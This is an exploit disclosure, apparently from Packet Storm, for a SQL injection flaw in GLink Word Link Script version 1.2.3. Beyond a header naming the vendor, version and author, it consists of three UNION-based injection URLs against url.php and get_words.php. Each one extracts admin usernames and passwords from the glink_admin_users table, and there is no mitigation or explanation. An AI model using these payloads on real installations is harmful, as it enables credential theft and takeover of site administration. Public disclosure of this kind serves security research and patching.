GLink Word Link Script version 1.2.3 suffers from a remote SQL injection vulnerability.
747e4c63b964c0b2248900a592b92907cc45965bc58ebbc6f8bf03f0e3e21876# # # # #
# Exploit Title: GLink Word Link Script v1.2.3 - SQL Injection
# Google Dork: N/A
# Date: 22.03.2017
# Vendor Homepage: https://www.tufat.com/
# Software: https://www.tufat.com/wp-content/uploads/sites/4/2015/zips/script_131.zip
# Demo: https://www.tufat.com/glink-word-link-script/
# Version: 1.2.3
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: https://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# https://localhost/[PATH]/url.php?id=[SQL]
# -1'+union+select+1,2,3,4,5,6,7,concat(user,0x3a,pass),9,10,11,12,13,14,15,16,17,18+from+glink_admin_users--+-
# https://localhost/[PATH]/get_words.php?gid=[SQL]
# -1'+union+select+1,concat(user,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+glink_admin_users--+-&step=3
# https://localhost/[PATH]/get_words.php?wid=[SQL]
# -1'+union+select+1,2,concat(user,0x3a,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+glink_admin_users--+-&gid=1&step=3
# Etc...
# # # # #
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed